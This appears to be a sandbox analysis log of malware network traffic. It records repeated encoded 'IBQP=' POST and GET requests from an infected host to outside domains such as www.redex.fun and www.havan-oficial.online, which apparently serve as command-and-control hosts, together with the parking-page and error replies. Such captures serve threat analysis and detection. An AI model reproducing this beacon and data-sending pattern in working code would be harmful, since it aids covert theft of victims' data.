                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnrOaJaw3Wk2FrBfiDwFpx2mo9gFKYkPNLipdBP66rLm8LnyMYgbBYQIpvQQgWcY4wvTzgb0bmYv6OASmQ8erZESjbB4HRFeGYzPiG2Hu3MgEZ41ltLZiCwU2b7Ql6drX11milUtSS5N7JmpZug7qHElN/5MKJfEhCVglQs32egeBGvZP0leBmCA==
Nov 11, 2024 17:05:15.977914095 CET | 735 | IN | HTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:05:15 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.11.20 | 49814 | 185.68.16.94 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:18.510823011 CET | 767 | OUT | POST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnquqJfQLWzmFoEfiDp1p92ms9gEPdk6dLiJNBdvOrMm8LvSMR9LBXQIlRQQsWcYswvSDgbjHlbf6MbCmehOrZESjbB4iKFeuYz/SG2muwCAEeyVltPZjqwU3M7SQfdvn11nylU5ONwN7P75YXjq3jIlNK5+ahFl9qU2oKxFC6jNd0rp2cncA9fLeFuBJwFHbn1mLfeKpSf8c=
Nov 11, 2024 17:05:18.758709908 CET | 735 | IN | HTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:05:18 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.11.20 | 49815 | 185.68.16.94 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:21.301706076 CET | 2578 | OUT | POST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnquqJfQLWzmFoEfiDp1p92ms9gEPdk59Lh71BPcmrNm8LlyMc9LBOQI9dQQxpcaUwu0/gPGzlAP6MESmf8erIESzlB4SKFeuYz8KGw3uwSwEZ41lhLZjRwUu57SVqceb11HClWKmNsd7N45Ymjq78Ihts5/+LFndqXC0VhUKQ+OtgrpyTzsEMX6GcmgpnEirv12PUMKlyd8eUfKe8fdNrtIO+XB9D0uqp2z9QcN5gY/BzWsMt94b/dliJw5TBaQHro1HJqeIJWl9t8QucS3ke4hl4n7m2fb+YM6CyLZ4gfygG8kSRFivq/wJqwZk7QDxLi1miCE0SjioNYyzMpmlTfKo0bvZZbQvnWPXNhvGEphFyjkCI6+4GceFumRaPq/G1SiVizQd5ukWDuOcvIg8IaVD5lX0W0hfX/vZoQxxO6wTNHnshlmaHWlA6/E1LL7qAxzw6vN24S/wtCHmXa6ZQkda1d8ntvR2VG9X2amusM/i62oZi/3Nr06gOAJIDcxOp1DV+klok6YdW8JexeY83ORswwf6r7qoYb9G8mDTbTtoq3tqhFLHVRBECcy+BbP/JLBHTL26gpQ9B89XMND8mxH8Q90GZE8jkiYJ/iHy7OKjcqmYaCjw5d+Ch8gcrUAPuwVWeui+rWbbqoHvDlxS0iMQIIAdvoiXqI+/XJUF9D4qbS+VymCazIqMrnjjVWWIzHNeNy8TakZSLKXykQiUWnfATR0suJLQZ1dAgaJMyeauCS6Ff0FJYxUrZR/2jNEwn9jpLahomSYQcvl02Ml7/PeXgo+sRlB4epHsbtUk+b8zT5mxCZrlJqNG22Nf6gL5iUe3toHTY026v0nQMrWdYRRQeVGYicnVu8n32L2dSOgvRWXlt5JXLtIYFZ74XdNbkpayLbOjiiF2J/mJAogS6KFparFTqtu6uqbO38g6Hc1GWuWWWFxtwEvClV/PONvBdMQzrgQ0c3Sb2/FVimMjwD9oXurSOyNGfZt7 [TRUNCATED]
Nov 11, 2024 17:05:21.301724911 CET | 3867 | OUT |
                                                                                                Data Ascii: j3fKfgN+NXBK9Ov2BIO4NOWA4MNlSWTnkDmPs6Mc1RpVRYhth5ErqhAjc0rpr4judwmKdJ5nxwffjk/hbYaPMgqv+FnIILqn+MRzB59Ej6gBvErf2KWuD+xmo4KebQNqq7f6d/4sAxQvT131MD/BWvyNO2cU+XgeDWD86z3786EZQXir/tCgLMsCIqL5xbtKMxE1Hf9IOYXEKgOsoR0A6Y+irEUYb0y5dGD0/8O78jjnkWUCg9o
Nov 11, 2024 17:05:21.301800013 CET | 1471 | OUT |
                                                                                                Data Ascii: kJZ+a1Pgs0KnhMudfkZy4CB9hh6qKCr7Sr6lueAlfKmkXJkCqeDjj8rtOqM9CoHporr2mwn977QeoCWpNkePxhzbxvzVn1Lc3o3q+RNRESVSUpTSnzkICPYZGf/faB0nDcUCYtdWPYAMXGMLkCLcH7AMH3EaYL8wQBjEsVKdPOyyDdcqPM9MFVneF0EZzUfQKWfEMJl/8P3ys6xf2Y0eysNgOjYK3vO10Mq1+slhHjeylCsaKLG
Nov 11, 2024 17:05:21.549880028 CET | 735 | IN | HTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:05:21 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.11.20 | 49816 | 185.68.16.94 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:24.084741116 CET | 493 | OUT | GET /7tio/?IBQP=cWPhyGnsppbegOPzdBDZ8kAQGuS94D1G+AoDqW+mjKcXo4pHCPC/PWAHmCcbh45dI7FSbj8dWK0Lqwzkb07fC7SLHWTv9NL+DwjYDKm9EtTm1O3Sw1W7F3k=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:05:24.332834005 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:05:24 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Ascii: 17d0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /> <TITLE> www.redex.fun </TITLE> <link rel="stylesheet" href="https://cdn.adm.tools/parking-page/style.css" type="text/css" /> <script> window.languages = { 'en': { 'title': 'Website www.redex.fun not configured on server', 'h1': 'Website www.redex.fun not configured on server', '.message1': 'Website <b>www.redex.fun</b> is not configured on the hosting server.', '.message2': 'Domain address record points to our server, but this site is not served.<br>If you have recently added a site to your control panel - wait 15 minutes and your site will start working.', '.help_button': 'How can I fix this?', }, 'pl': { 'title': 'Witryna www.redex.fun niesko [TRUNCATED]
Nov 11, 2024 17:05:24.332942009 CET | 1289 | IN |
                                                                                                Data Ascii: '.message1': 'Witryna <b>www.redex.fun</b> nie jest skonfigurowana na serwerze hostingowym.', '.message2': 'Rekord adresu domeny wskazuje na nasz serwer, ale ta witryna nie jest obsugiwana.<br>Jeli niedawno doda
Nov 11, 2024 17:05:24.332952023 CET | 1289 | IN |
                                                                                                Data Ascii: edex.fun</b> .', '.message2': ' ,
Nov 11, 2024 17:05:24.332959890 CET | 1289 | IN |
                                                                                                Data Ascii: '.message1': ' <b>www.redex.fun</b> .', '.message2': ' ,
Nov 11, 2024 17:05:24.332984924 CET | 1122 | IN |
                                                                                                Data Ascii: entListener("DOMContentLoaded", display); </script></head><body><div class="container"> <div class="content"> <div class="text"> <h1> www.redex.fun </h1>


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.11.20 | 49817 | 199.59.243.227 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:29.471441031 CET | 780 | OUT | POST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=zeF4BSP+n9dFodUef21TGkRc7BrohMffbdWuNOZ0RHrBn4d/PgjjvN4M04xvU+L3EwujaA+Ri7tsCRdXHbTV626cqMRhJh4s83/nCLGEf+6ytcGQo3EZabDCFOLuSDGmsWrOHuBRiCwkbqwU3Ea/dOnTCTsS1FgdjCkWhTC9vSqb2BvY69uESqZbxnHIM3UMbw==
Nov 11, 2024 17:05:29.606569052 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:05:29 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: b866497d-374f-4207-9e05-d844bd04d35f
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=b866497d-374f-4207-9e05-d844bd04d35f; expires=Mon, 11 Nov 2024 16:20:29 GMT; path=/
                                                                                                connection: close
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 11, 2024 17:05:29.606605053 CET | 550 | IN |
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjg2NjQ5N2QtMzc0Zi00MjA3LTllMDUtZDg0NGJkMDRkMzVmIiwicGFnZV90aW1lIjoxNzMxMzQxMTI5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.11.20 | 49818 | 199.59.243.227 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:32.127116919 CET | 800 | OUT | POST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=zeF4BSP+n9dFq9keZUdTR0Qu1hrorsfTbdquNKArRVPBnYN/OibjsN4MsoxqaeLCEwzeaBCRi75sCTFXHKTW4m6esMRjGB4s83/nCLTZf6uyus2QqV8eS7DNTeLuYjGisWrsHvd7iA4kbo4U51a8KenVcjtZ438SnSEAkxrgrB2X63iCnPagR5Fp1X+gO1VXGzqUg6Wo+7GX+PBjlTxEZ0c=
Nov 11, 2024 17:05:32.262219906 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:05:32 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: b4c6324e-54f6-4e9d-8e04-fcb3a7c5eb65
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=b4c6324e-54f6-4e9d-8e04-fcb3a7c5eb65; expires=Mon, 11 Nov 2024 16:20:32 GMT; path=/
                                                                                                connection: close
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 11, 2024 17:05:32.262269974 CET | 550 | IN
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjRjNjMyNGUtNTRmNi00ZTlkLThlMDQtZmNiM2E3YzVlYjY1IiwicGFnZV90aW1lIjoxNzMxMzQxMTMyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.11.20 | 49819 | 199.59.243.227 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:34.800620079 CET | 2578 | OUT | POST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Data Ascii: IBQP= [TRUNCATED]
Nov 11, 2024 17:05:34.800676107 CET | 5371 | OUT
                                                                                                Data Ascii: eI/GpDWCo0h0Ddx6M7WUQUaQH0kI3aWLZTmgUuApO2lSrGSdvFMl0/HeYAQZSda/2HKX5wXvZO20zfL4430ON5BUELlJKQFMkgzIMfzJaW+qMol71wr/mfBA96f0ucz1rwMGrPyrS0NeDitOTipC5yNK4qafxTIllUzK7Owp1Tbr/fOf9MhBZxFyWijOdr1YcMSmH9ZX9pZnwcaHN9DFG3E6mOW6t1Nb72tzGMdTsfkjeNPQoSW
Nov 11, 2024 17:05:34.935899973 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:05:34 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: c0dd3f6e-c992-4346-846a-dde344f0e2a8
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=c0dd3f6e-c992-4346-846a-dde344f0e2a8; expires=Mon, 11 Nov 2024 16:20:34 GMT; path=/
                                                                                                connection: close
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 11, 2024 17:05:34.935949087 CET | 550 | IN
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzBkZDNmNmUtYzk5Mi00MzQ2LTg0NmEtZGRlMzQ0ZjBlMmE4IiwicGFnZV90aW1lIjoxNzMxMzQxMTM0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.11.20 | 49820 | 199.59.243.227 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:37.468961954 CET | 504 | OUT | GET /m462/?Lr3=uHMLTHRPCpsdapr&IBQP=+ctYCmnSkPlep9Adc1BBeyk16jbVmqK7c+CyNKpVFEvGl71cISvbhoUUnqNAW+fldTGCXi6FrrY6EQlGHI7/1BufmIEFBScb4VziJby0bO6di8KjpFsVcvc= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:05:37.603640079 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:05:37 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1490
                                                                                                x-request-id: c376c6cc-9021-4d98-848d-91eda7a44165
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FXHELMCSvHfvZQ3fdxfXMjkxnlVuXcTL5OPTt/qm0O8RYNA9u7PK9d0xDL6/WOOqcqXaX6SGwQ4cDMI0FbTepg==
                                                                                                set-cookie: parking_session=c376c6cc-9021-4d98-848d-91eda7a44165; expires=Mon, 11 Nov 2024 16:20:37 GMT; path=/
                                                                                                connection: close
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FXHELMCSvHfvZQ3fdxfXMjkxnlVuXcTL5OPTt/qm0O8RYNA9u7PK9d0xDL6/WOOqcqXaX6SGwQ4cDMI0FbTepg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 11, 2024 17:05:37.603722095 CET | 890 | IN
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzM3NmM2Y2MtOTAyMS00ZDk4LTg0OGQtOTFlZGE3YTQ0MTY1IiwicGFnZV90aW1lIjoxNzMxMzQxMTM3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.11.20 | 49821 | 192.64.118.221 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:42.910332918 CET | 753 | OUT | POST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxs6w4KKFUcwv48zPua4OtcRw4IOrFhti+QJ6S5fAl1YH5P019vrhb6MwxGrzlHVlSrKjqcQDx3WWAF+RxXlG/eRHblT26dSKb21e6A7dZ92/scMOGkjAK+e3DbZZpIDGJuXiwpckKsE/G8LW0aHxLxt3fWkemBDbmcKpCMLwXbc/B8FNVYJK98g==
Nov 11, 2024 17:05:43.224169016 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:05:43 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.11.20 | 49822 | 192.64.118.221 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:45.734800100 CET | 773 | OUT | POST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxtbg4IptUUwv7gDPuTYOxcRs4ILLVgeG+QoqS4asl54H5c014wbhq6M0XGrPlHVBSrOnqcjb22GWCcuRzUVG/eRHblTScdTib2AO6Badahm/rK8OG1TAO+e2WbYFPIBOJuSGwntkNnE/AzrXdeCsn5/CobFqTEhbbdckYR5EzYPjz4109aLLmhoINpUTzUQsGF/YRC/uati8=
Nov 11, 2024 17:05:46.037164927 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:05:45 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


